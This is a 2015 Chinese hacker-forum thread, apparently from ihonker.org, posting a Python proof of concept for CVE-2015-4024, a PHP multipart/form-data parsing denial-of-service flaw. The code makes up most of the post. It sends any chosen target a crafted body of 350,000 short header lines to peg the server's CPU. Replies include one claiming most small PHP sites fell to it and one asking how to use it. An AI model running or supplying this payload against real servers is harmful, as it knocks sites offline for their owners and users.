PHP远程DoS漏洞深入分析及防护方案

90_ · 发表于 2015-5-19 21:51:18

CVE:2015-4024
漏洞的原理是：当PHP解析multipart / form-data的HTTP请求的body parthead的时候，会重复进行字符串的拷贝。
利用该漏洞构造poc发起链接，很容易导致目标主机cpu的占用率100%，涉及PhP所有版本！

pdf转自绿盟科技威胁响应中心
点击我查看

POC：

[Java] 纯文本查看 复制代码

'''
Author: Shusheng Liu,The Department of Security Cloud, Baidu
email: [email]liusscs@163.com[/email]
'''
import sys
import urllib,urllib2
import datetime
from optparse import OptionParser

def http_proxy(proxy_url):

    proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
    null_proxy_handler = urllib2.ProxyHandler({})
    opener = urllib2.build_opener(proxy_handler)
    urllib2.install_opener(opener)
#end http_proxy 

def check_php_multipartform_dos(url,post_body,headers):
	req = urllib2.Request(url)
	for key in headers.keys():
		req.add_header(key,headers[key])
	starttime = datetime.datetime.now();
	fd = urllib2.urlopen(req,post_body)
	html = fd.read()
	endtime = datetime.datetime.now()
	usetime=(endtime - starttime).seconds
	if(usetime > 5):
		result = url+" is vulnerable";
	else:
		if(usetime > 3):
			result = "need to check normal respond time"
	return [result,usetime]
#end


def main():
    #http_proxy("http://127.0.0.1:8089")
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store", 
                  dest="target", 
                  default=False, 
		  type="string",
                  help="test target")
    (options, args) = parser.parse_args()
    if(options.target):
	target = options.target
    else:
	return;

    Num=350000
    headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
            'Accept-Encoding':'gzip, deflate',
            'User-Agent':'Mozillal/5.0 (Windows NT 6.1; WOW64) AppleWebKiti/537.36 (KHTML, like Gecko) Chromeu/40.0.2214.111 Safariss/537.36'}
    body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
    payload=""
    for i in range(0,Num):
        payload = payload + "a\n"
    body = body + payload;
    body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
    print "starting...";
    respond=check_php_multipartform_dos(target,body,headers)
    print "Result : "
    print respond[0]
    print "Respond time : "+str(respond[1]) + " seconds";

if __name__=="__main__":
    main()

推推棒 · 发表于 2015-5-21 17:22:23

测试了，绝大部分PHP小网站中招。

conosc · 发表于 2015-5-23 21:13:10

咋用？？？{:soso_e132:}

cl476874045 · 发表于 2015-6-27 05:36:00

Lucifer · 发表于 2015-6-27 06:42:38

支持中国红客联盟(ihonker.org)

菜鸟小羽 · 发表于 2015-6-27 07:17:05

支持中国红客联盟(ihonker.org)

H.U.C—Prince · 发表于 2015-6-27 14:18:44

还是不错的哦，顶了

54hacker · 发表于 2015-6-27 15:16:01

学习学习技术，加油！

HUC-参谋长 · 发表于 2015-6-28 07:13:15

支持中国红客联盟(ihonker.org)

ruguoruo · 发表于 2015-6-30 02:28:18

支持，看起来不错呢！

PHP远程DoS漏洞深入分析及防护方案

点评

指导单位

旗下站点

联系我们